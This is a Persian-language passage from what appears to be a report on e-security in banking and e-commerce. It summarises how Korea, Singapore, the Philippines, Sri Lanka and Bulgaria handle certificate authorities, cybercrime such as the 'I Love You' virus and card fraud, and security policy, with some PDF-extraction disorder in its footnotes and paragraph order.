‫ﺍﻧﺠﺎﻡ ﻣﻌﺎﻣﻼﺕ ﺍﻳﻤﻦ ﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﻣﺸﺘﺮﻳﺎﻥ ﻧﻤﻲﺧﻮﺍﻫﻨﺪ ﺩﺭ‬
‫ﺗﺠﺎﺭﺕ ﺩﭼﺎﺭ ﺗﺄﺧﻴﺮ ﻳﺎ ﮔﺮﻓﺘﺎﺭ ﺩﺭﺩﺳﺮﻫﺎﻱ ﺩﻳﮕﺮ ﺷﻮﻧﺪ‪.‬‬
‫ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻳﻚ ﺣﺎﺩﺛﺔ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻛﺮﻩ ﺑﺤﺚ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺭﺍ ﺩﮔﺮﮔـﻮﻥ ﺳـﺎﺧﺖ‪ .‬ﺩﺭ ﻣـﺎﻩ‬
‫‪231 Certification Authorities‬‬
‫‪232 Korean Information Security Agency‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺳﻨﮕﺎﭘﻮﺭ ﺑﻨﺎ ﺩﺍﺷﺖ ﺩﺭ ﺑﻬﺎﺭ ﺳﺎﻝ ‪ ۲۰۰۳‬ﺧﻂﻣﺸﻲﻫﺎﻱ ﻣﺪﻳﺮﻳﺖ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ﺧﻮﺩ ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﻨﺪ‪ .‬ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻳﻦ ﻛﺸﻮﺭ ﺑـﺮ‬
‫ﺍﺳﺎﺱ ﺗﺠﺮﺑﻴﺎﺕ ﻣﻔﻴﺪ ﺻﻨﻌﺖ‪ ،‬ﺑﺎ ﻛﻤﻚ ﻧﻬﺎﺩﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ‪ ،‬ﻭ‬
‫ﺑﺮ ﻣﺒﻨﺎﻱ ﭼﻜﻴﺪﺓ ﺟﻠﺴﺎﺕ ﻣﺨﺘﻠﻒ ﻣﻴﺎﻥ ﺑﺎﻧﻜﻬﺎﻱ ﻓﻌﺎﻝ ﺻـﻨﻌﺘﻲ‬
‫ﻭ ﻣﻘﺎﻣﺎﺕ ﺩﻭﻟﺘﻲ ﻫﺪﺍﻳﺖ ﻣﻲ ﺷﻮﺩ‪ .‬ﻳﻜـﻲ ﺍﺯ ﭘﺮﺳـﺸﻬﺎﻱ ﺍﺻـﻠﻲ‬
‫ﺳﻨﮕﺎﭘﻮﺭ ﻛﻪ ﺩﺍﺭﺍﻱ ﺗﻨﻬـﺎ ﻳـﻚ ﻧﻬـﺎﺩ ﺑـﺮﺍﻱ ﺗـﺪﻭﻳﻦ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ‬
‫ﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﻭ‬
‫ﻣﻲﺑﺎﺷﺪ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﭼﮕﻮﻧﻪ ﺩﻭﻟﺘﻲ ﺑﻪ ﺑﺰﺭﮔ ﹺ‬
‫ﺑﺎ ﺩﺍﺷﺘﻦ ﻣﺮﺍﺟﻊ ﻣﺘﻌﺪﺩ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﺳﺎﺯﻱ‪ ،‬ﻣﻲﺗﻮﺍﻧﺪ ﺿﻮﺍﺑﻂ ﺧﻮﺩ ﺭﺍ‬
‫ﺑﺼﻮﺭﺕ ﻳﻜﭙﺎﺭﭼﻪ ﺍﻋﻤﺎﻝ ﻛﻨﺪ‪.‬‬
‫ﻓﻴﻠﻴﭙﻴﻦ‬
‫ﺑﺤﺚ ﻓﻴﻠﻴﭙﻴﻦ ﺭﻭﻱ ﻧﺘﺎﻳﺞ ﺳﻪ ﻧﮕـﺮﺵ ﻣﻤﻜـﻦ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺭﺷـﺪ‬
‫ﻓﺰﺍﻳﻨﺪﺓ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﻣﺘﻤﺮﻛﺰ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﺳـﻪ ﻧﮕـﺮﺵ‬
‫ﻋﺒﺎﺭﺕ ﺑﻮﺩﻧﺪ ﺍﺯ ﮔﺴﺘﺮﺵ ﻭﻳﺮﻭﺳﻬﺎ )ﻣﺜـﻞ ﻭﻳـﺮﻭﺱ ‪،(I Love You‬‬
‫ﺳﺮﻗﺖ ﻣﺪﺍﻭﻡ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ‪ ،‬ﻭ ﻧﻴﺰ ﺣﺎﺩﺛﺔ ﻳﺎﺯﺩﻫﻢ ﺳـﭙﺘﺎﻣﺒﺮ‪.‬‬
‫ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﻛـﺸﻮﺭ ﻓﻴﻠﻴﭙـﻴﻦ ﺍﺯ ﺣﺎﺩﺛـﺔ ﻳـﺎﺯﺩﻫﻢ ﺳـﭙﺘﺎﻣﺒﺮ ﺑـﺮﺍﻱ‬
‫ﺗﺸﺮﻳﺢ ﻣﺤﺎﺳﺒﺎﺕ ﺩﻭﻟﺖ ﺧﻮﺩ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ﻣﻠـﻲ‬
‫ﺍﻗﺘﺼﺎﺩﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻧﺪ‪.‬‬
‫ﺩﺭ ﻓﻴﻠﻴﭙــﻴﻦ‪ ،‬ﮔــﺴﺘﺮﺵ ﻭﻳــﺮﻭﺱ "‪ "I Love You‬ﺑــﺴﺮﻋﺖ‬
‫ﻧﻬﺎﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺭﺍ ﺑـﻪ ﻭﺍﻛـﻨﺶ ﻭﺍﺩﺍﺭ ﻛـﺮﺩ‪ .‬ﺍﻳـﻦ ﺣﺎﺩﺛـﻪ ﺍﺯ ﺁﻥ‬
‫ﺟﻬــﺖ ﻛــﻪ ﺿــﻌﻔﻬﺎﻱ ﺩﻭﻟــﺖ ﻭ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﺭﺍ ﻓــﺎﺵ‬
‫ﻣــﻲﺳــﺎﺧﺖ ﺍﺯ ﺍﻫﻤﻴــﺖ ﻭﻳــﮋﻩﺍﻱ ﺑﺮﺧــﻮﺭﺩﺍﺭ ﺑــﻮﺩ‪ .‬ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ‬
‫‪233 Licensed Certificate Authorities‬‬
‫ﻲ ﻓﻬﻢ ﻭ ﻭﺍﻛﻨﺶ ﻣﺆﺛﺮ ﺑﻪ ﺣﻮﺍﺩﺙ‬
‫ﻫﻤﭽﻨﻴﻦ ﻇﺮﻓﻴﺖ ﻗﺪﺭﺕ ﻗﺎﻧﻮﻧ ﹺ‬
‫ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺑﻪ ﻣﻨﺼﺔ ﻇﻬﻮﺭ ﺭﺳـﺎﻧﺪ ﻭ ﺩﺭ ﻧﺘﻴﺠـﺔ ﻳـﻚ‬
‫ﺑﺮﻧﺎﻣﺔ ﺁﻣﻮﺯﺵ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ ﺩﻭﻟﺖ ﺑﻪ ﺍﺟﺮﺍ ﮔﺬﺍﺷﺘﻪ ﺷﺪ‬
‫ﻭ ﺩﻭﻟﺖ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺩﺭ ﺍﻳﻦ ﻋﺮﺻﻪ ﻗﻮﺍﻧﻴﻦ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ‬
‫ﺍﺳﺘﺮﺍﺗﮋﻱ ﺳﺎﻳﺒﺮ‪ ٢٣٤‬ﺭﺍ ﺍﺯ ﺩﺍﻳﺮﺓ ﺗﺼﻮﻳﺐ ﮔﺬﺭﺍﻧﺪ‪.‬‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺩﺭ ﺣـﻮﺯﺓ ﺧـﺪﻣﺎﺕ‬
‫ﻞ‬
‫ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻓﻴﻠﻴﭙﻴﻦ )ﻣﺜﻞ ﻫﺮ ﻛﺸﻮﺭ ﺩﻳﮕﺮﻱ( ﺑﻪ ﻳﻚ ﻣﻌـﻀ ﹺ‬
‫ﺍﺳﺎﺳﻲ ﺗﺒﺪﻳﻞ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳـﻦ ﻛـﺸﻮﺭ ﺩﺍﺭﺍﻱ ‪ ۲‬ﺗـﺎ ‪ ۳‬ﻣﻴﻠﻴـﻮﻥ‬
‫ﺩﺍﺭﻧــﺪﺓ ﻛــﺎﺭﺕ ﺍﻋﺘﺒــﺎﺭﻱ ﺍﺳــﺖ ﻭ ﺣــﺪﻭﺩ ‪ ۱۷‬ﺑﺎﻧــﻚ‪ ،‬ﺧــﺪﻣﺎﺕ‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﺍﻳﻦ ﻛﺎﺭﺗﻬﺎ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﻭ ﺩﺭ ﺳﺎﻝ ﭼﻨﺪﻳﻦ ﻣﻴﻠﻴـﻮﻥ‬
‫ﺗﺒﺎﺩﻝ ﺗﺠﺎﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻧﺠﺎﻡ ﻣﻲ ﺷﻮﺩ‪ .‬ﺗﺨﻤﻴﻦ ﺯﺩﻩ ﺷﺪﻩ ﻛﻪ‬
‫ﺣﺪﻭﺩ ‪ ۴۰۰‬ﻣﻴﻠﻴﻮﻥ ﭘﺰﻭ )ﻣﻌﺎﺩﻝ ‪ ۸‬ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺁﻣﺮﻳﻜﺎ( ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ‬
‫ﻣﺎﻟﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎﻱ ﺻﻮﺭﺕﮔﺮﻓﺘﻪ ﺍﺯ ﻛﺎﺭﺗﻬـﺎﻱ‬
‫ﺍﻋﺘﺒــﺎﺭﻱ ﻧــﺴﺒﺖ ﺩﺍﺩ‪ .‬ﺩﺳــﺘﮕﺎﻫﻬﺎﻱ ﺧــﻮﺩﭘﺮﺩﺍﺯ ﻧﻴــﺰ ﺑﻄــﻮﺭ‬
‫ﮔﺴﺘﺮﺩﻩﺍﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻫـﺴﺘﻨﺪ ﻭ ﺩﺭ ﺳﺮﺍﺳـﺮ ﻛـﺸﻮﺭ ﭼﻴـﺰﻱ‬
‫ﺣﺪﻭﺩ ‪ ۱۰‬ﻣﻴﻠﻴﻮﻥ ﻣﺸﺘﺮﻱ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﺳﻮﻣﻴﻦ ﻣﻮﺿﻮﻉ ﺑﺤﺚ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻳـﺎﺯﺩﻫﻢ ﺳـﭙﺘﺎﻣﺒﺮ ﺑﺎﻧﻜﻬـﺎ ﺭﺍ‬
‫ﻣﺠﺒﻮﺭ ﺳﺎﺧﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﻪ ﺗـﻼﺵ‬
‫ﺟﻬﺖ ﺍﻓﺰﺍﻳﺶ ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﻛﺸﻮﺭﻫﺎﻱ ﺩﻳﮕﺮ ﺑﭙﺮﺩﺍﺯﻧﺪ‪.‬‬
‫ﻫﻤﺎﻧﻨﺪ ﺳﺎﻳﺮ ﻧﻘﺎﻁ ﺟﻬﺎﻥ‪ ،‬ﺍﻗﺘﺼﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻓﻴﻠﻴﭙﻴﻦ ﻫﻢ ﻫﻨﻮﺯ‬
‫ﺩﺭ ﻣﺮﺍﺣﻞ ﺍﻭﻟﻴﺔ ﺗﻮﺳﻌﻪ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ‪ .‬ﻓﻴﻠﻴﭙـﻴﻦ ﺩﺭ ﺍﻳـﻦ ﺭﺍﺳـﺘﺎ ﺑـﻪ‬
‫ﻗﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﻫﺸﺖ ﺭﻛﻦ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﺮﺍﻱ‬
‫ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻧﻴﺰ ﭘﺮﺩﺍﺧﺘﻪ ﺍﺳﺖ‪ :‬ﭘﻴﻮﻧﺪ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﺑـﺎ‬
‫ﺭﻭﺷﻬﺎﻱ ﺍﻋﻤﺎﻝ ﺿـﻮﺍﺑﻂ‪ ،‬ﺑﺮﻗـﺮﺍﺭﻱ ﻫﻤﻜـﺎﺭﻱ ﻣﻴـﺎﻥ ﺩﻭﻟـﺖ ﻭ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ‪ ،‬ﻭ ﻧﻴﺰ ﺑﻬﺒﻮﺩ ﺗﻮﺍﻧﺎﻳﻴﻬﺎﻱ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ‬
‫ﺩﺭ ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ‪ .‬ﺑﺎ ﺍﻳﻨﻬﻤﻪ ﻓﻴﻠﻴﭙﻴﻦ ﻫﻨـﻮﺯ ﻧﻴﺎﺯﻣﻨـﺪ‬
‫ﻛﺎﺭﺷﻨﺎﺳــﺎﻥ ﺧﺒــﺮﺓ ﻗــﺎﻧﻮﻧﻲ‪ ،‬ﺑﺨــﺼﻮﺹ ﺑــﺮﺍﻱ ﺩﺍﺩﮔﺎﻫﻬــﺎﻱ‬
‫ﺗﺨﺼﺼﻲ ﺍﺳﺖ‪ .‬ﺍﺯ ﺩﻳﮕﺮ ﻧﻴﺎﺯﻫـﺎﻱ ﺍﻳـﻦ ﻛـﺸﻮﺭ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ﻭ ﺁﻣﻮﺯﺵ ﻛﻠﻴﺔ ﺍﻓﺮﺍﺩ ﺩﺭﮔﻴﺮ ﺩﺭ ﺣـﻮﺯﺓ ﺧـﺪﻣﺎﺕ‬
‫ﻣﺎﻟﻲ ﺷﺎﻣﻞ ﻣﺸﺘﺮﻳﺎﻥ‪ ،‬ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ‪ ،‬ﻭ ﺷـﺮﻛﺘﻬﺎﻱ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﺓ‬
‫ﺧﺪﻣﺎﺕ ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪.‬‬
‫ﻓﻴﻠﻴﭙﻴﻨﻲ ﻫﺎ ﺩﻭ ﺳﺆﺍﻝ ﻋﻤﺪﻩ ﻣﻄﺮﺡ ﻛﺮﺩﻧـﺪ‪ (۱ :‬ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ‬
‫ﭼﮕﻮﻧﻪ ﻣﻴﺎﻥ ﮔﺰﺍﺭﺵ ﺭﻭﻳﺪﺍﺩﻫﺎ ﻭ ﺣﻔﻆ ﻣﺴﺎﺋﻞ ﻣﺤﺮﻣﺎﻧﻪ‪ ،‬ﺗـﻮﺍﺯﻥ‬
‫ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩﻩ ﺍﺳﺖ؟ ﻭ ‪ (۲‬ﺟﺎﻳﮕﺎﻩ ﭘﻠـﻴﺲ ﺑـﻴﻦﺍﻟﻤﻠـﻞ ﺩﺭ ﻗـﻮﺍﻧﻴﻦ‬
‫ﺟﺮﺍﺋﻢ ﺟﺰﺍﻳﻲ ﭼﻴﺴﺖ؟‬
‫‪234 Cyber-Strategy‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺁﮔﻮﺳــﺖ ﺳــﺎﻝ ﮔﺬﺷــﺘﻪ ﭼﻨــﺪ ﺷــﺮﻛﺖ ﻭﺍﺳــﻄﻪﺍﻱ ﺣــﺴﺎﺑﻬﺎﻱ‬
‫ﻏﻴﺮﻓﻌــﺎﻝ ﻭ ﻣــﺴﻜﻮﺗﻲ ﺭﺍ ﻳﺎﻓﺘﻨــﺪ ﻛــﻪ ﺗﻨﻬــﺎ ﺑﻌﻨــﻮﺍﻥ ﺑﺨــﺸﻲ ﺍﺯ‬
‫ﻛﺎﺭﻫــﺎﻱ ﺧــﻮﺩ ﺣــﺪﻭﺩ ‪ ۲۰‬ﻣﻴﻠﻴــﻮﻥ ﺩﻻﺭ ﺁﻣﺮﻳﻜــﺎ ﺳــﻬﺎﻡ ﺍﺯ‬
‫ﺳـﺮﻣﺎﻳﻪﮔــﺬﺍﺭﺍﻥ ﺧﺮﻳـﺪﻩ ﺑﻮﺩﻧــﺪ‪ .‬ﺩﺭ ﻭﺍﻛــﻨﺶ ﺑـﻪ ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ‪،‬‬
‫ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺍﻓـﺰﺍﻳﺶ ﻳﺎﻓـﺖ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ‬
‫ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺟﺒﺎﺭ ﮔﺴﺘﺮﺩﻩﺗﺮﻱ ﭘﻴﺪﺍ ﻛﺮﺩ‪ .‬ﺩﺭ ﺍﻭﻝ ﺩﺳﺎﻣﺒﺮ ﺳﺎﻝ‬
‫‪ ،۲۰۰۲‬ﮔﻮﺍﻫﻲﻫﺎﻱ ﺧﺼﻮﺻﻲ "ﻓﺎﻗﺪ ﺍﻋﺘﺒـﺎﺭ" ﺍﻋـﻼﻡ ﺷـﺪﻧﺪ ﻭ ﺍﺯ‬
‫ﺁﻥ ﭘﺲ ﺗﻨﻬﺎ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻣﺮﺍﻛﺰ ﺗﺄﻳﻴﺪﺷﺪﺓ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‬
‫)‪ ٢٣٣(LCAs‬ﺻﺎﺩﺭ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﻣﻌﺘﺒﺮ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻣﺪﻧﺪ ﻭ ﺗﺎ ﻣﺎﻩ‬
‫ﻣﻲ ﺳﺎﻝ ‪ ۲۰۰۳‬ﻧﻴﺰ ﻫﻤﺔ ﮔﻮﺍﻫﻲﻫﺎ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻣﺠﺪﺩ ﻗـﺮﺍﺭ‬
‫ﻣﻲ ﮔﺮﻓﺘﻨﺪ‪ .‬ﺿﺮﻭﺭﻱ ﺷـﺪ ﻛـﻪ ﻫﻤـﺔ ﺷـﺮﻛﺘﻬﺎﻱ ﻭﺍﺳـﻄﻪﺍﻱ ﺍﺯ‬
‫ﻧﻮﺍﻣﺒﺮ ‪ ۲۰۰۲‬ﻭ ﻣﺆﺳﺴﺎﺕ ﻛﻮﭼﻜﺘﺮ ﺍﺯ ﮊﺍﻧﻮﻳﻪ ‪ ۲۰۰۳‬ﺑـﻪ ﺑﻌـﺪ‪ ،‬ﺩﺭ‬
‫ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺮﺍﻛﺰ ﺗﺄﻳﻴﺪﺷﺪﺓ ﺻﺪﻭﺭ ﮔـﻮﺍﻫﻲ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬
‫‪٢١٩‬‬
‫‪٢٢٠‬‬
‫ﺳﺮﻳﻼﻧﻜﺎ‬
‫ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﺳﺮﻳﻼﻧﻜﺎ ﺻﺤﺒﺖ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺍﺭﺍﺋﻪ ﭘـﻴﺶﺯﻣﻴﻨـﻪﺍﻱ ﺍﺯ‬
‫ﺍﻗﺘﺼﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺑﺤـﺚ ﺩﺭﺑـﺎﺭﺓ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎﻱ ﮔـﺴﺘﺮﺵ‬
‫ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻳﻨﺘﺮﻧﺖ ﺁﻏﺎﺯ ﻛﺮﺩﻧﺪ‪ .‬ﺁﻧﻬﺎ ﻋﻘﻴﺪﻩ ﺩﺍﺷـﺘﻨﺪ‬
‫ﻛﻪ ﻣﺴﺎﺋﻞ ﻣﺮﺑﻮﻁ ﺑﻪ ﮔﺴﺘﺮﺵ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻪ ﺯﻭﺩﻱ ﺣﻞ ﺧﻮﺍﻫﻨﺪ‬
‫ﺷﺪ ﻭ ﻣﺸﻜﻞ ﻋﺪﻡ ﺁﮔﺎﻫﻲ ﻧﻴﺰ ﺑﻴﺸﺘﺮ ﺩﺭ ﺳﻄﺢ ﻣـﺪﻳﺮﻳﺖ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﺩ ﻭ ﺑﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﺟﻠـﺐ ﺣﻤﺎﻳـﺖ ﺩﺭ ﺯﻣﻴﻨـﻪﻫـﺎﻳﻲ ﻣﺜـﻞ‬
‫ﮔﺴﺘﺮﺵ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ‪ .‬ﻧﻘﻄﻪﺿﻌﻒ ﺩﻳﮕﺮﻱ ﻛـﻪ‬
‫ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺩﺭ ﻣﻴﺎﻥ ﻣﺸﺘﺮﻳﺎﻥ ﻳﺎﻓـﺖ‪ ،‬ﻋـﺪﻡ ﺁﮔـﺎﻫﻲ ﺍﺯ ﻧﺤـﻮﺓ‬
‫ﺍﻧﺠﺎﻡ ﻳﻚ ﻣﻌﺎﻣﻠﺔ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﻳﻤﻦ ﺍﺳﺖ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺍﻋﺘﻤـﺎﺩ ﻣﻴـﺎﻥ‬
‫ﻣﺸﺘﺮﻳﺎﻥ ﻛﺎﻫﺶ ﻳﺎﻓﺘﻪ ﻭ ﻛﻤﺘﺮ ﻣﺎﻳﻞ ﺑـﻪ ﺷـﺮﻛﺖ ﺩﺭ ﻣﻌـﺎﻣﻼﺕ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﻳﺠﺎﺩ ﻭ ﺍﺭﺍﺋﻪ ﺧﻂﻣﺸﻲﻫﺎ ﻭ ﻣﺒﺎﻧﻲ ﻛﺎﺭﻱ ﺑـﻪ‬
‫ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻳﺠـﺎﺩ ﺍﻋﺘﻤـﺎﺩ ﺩﺭ ﻣـﺸﺘﺮﻳﺎﻥ‬
‫ﻫﻢ ﻛﻤﻚ ﻛﻨﺪ‪.‬‬
‫ﭘﺮﺳﺶ ﺳﺮﻳﻼﻧﻜﺎ ﻣﺘﻮﺟﻪ ﻓﺮﺍﻫﻢﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑـﻮﺩ‪.‬‬
‫ﺁﻧﻬﺎ ﻣﻲﺧﻮﺍﺳﺘﻨﺪ ﺑﺪﺍﻧﻨﺪ ﻛـﻪ ﺁﻳـﺎ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ ﺭﺳـﻤﻲ ﻭ ﻣﺒـﺎﻧﻲ‬
‫ﻛﺎﺭﻱ ﺑﺮﺍﻱ ‪ISP‬ﻫﺎ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭﺟﻮﺩ ﺧﻮﺍﻫـﺪ‬
‫ﺩﺍﺷﺖ ﻳﺎ ﺧﻴﺮ‪ .‬ﺁﻧﻬﺎ ﻫﻤﭽﻨﻴﻦ ﺧﻮﺍﺳﺘﺎﺭ ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭﺑﺎﺭﺓ‬
‫ﺳﺎﺯﻣﺎﻥ ﺍﻣﻨﻴﺖ ﻛﺮﻩ ﺷﺪﻧﺪ ‪ -‬ﺍﻳﻨﻜـﻪ ﺁﻳـﺎ ﺧـﺼﻮﺻﻲ ﻳـﺎ ﺩﻭﻟﺘـﻲ‬
‫ﺍﺳﺖ‪ ،‬ﻭ ﺍﻳﻨﻜﻪ ﭼﻪ ﻧﻘﺸﻬﺎﻳﻲ ﺭﺍ ﺗﺤﺖ ﭘﻮﺷﺶ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺑﻠﻐﺎﺭﺳﺘﺎﻥ‬
‫ﺧﺪﻣﺎﺕ ﻧﻮﻳﻦ ﺑـﺎﻧﻜﻲ ﺑﻠﻐﺎﺭﺳـﺘﺎﻥ ﺩﺭ ﺳـﺎﻝ ‪ ۱۹۸۹‬ﺑـﺎ ﻓﺮﻫﻨﮕـﻲ‬
‫ﻣﺸﺎﺑﻪ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭ ﺍﺭﻭﭘﺎ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺷﺪ‪ .‬ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺷﺎﻣﻞ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﻭ ﺑﺴﺘﻪﻫﺎﻱ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺧـﺎﺹ ﺻـﻨﻌﺖ‬
‫ﺑﺎﻧﻜﺪﺍﺭﻱ ﺑﻮﺩ )ﺑﺮﺍﻱ ﻣﺜـﺎﻝ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ ‪ BANKNET‬ﺍﺷـﺎﺭﻩ ﻛـﺮﺩ(‪.‬‬
‫ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺎ ﺳﺆﺍﻻﺕ ﺍﺳﺎﺳـﻲ ﺩﺭ ﺯﻣﻴﻨـﺔ‬
‫ﺍﻳﻨﻜﻪ "ﭼﻪ ﭼﻴﺰﻱ ﺑﺎﻳﺪ ﺣﻔﺎﻇﺖ ﺷﻮﺩ" ﺁﻏﺎﺯ ﻛﺮﺩ‪ ،‬ﻭ ﺳﭙﺲ ﻋﻨﺎﺻﺮ‬
‫ﺣﻴــﺎﺗﻲ ﺍﻳﻨﻜــﺎﺭ ‪ -‬ﻣﺜــﻞ ﺷــﺒﻜﻪﻫــﺎﻱ ﻓﻴﺰﻳﻜــﻲ‪ ،‬ﺳﻴــﺴﺘﻤﻬﺎﻱ‬
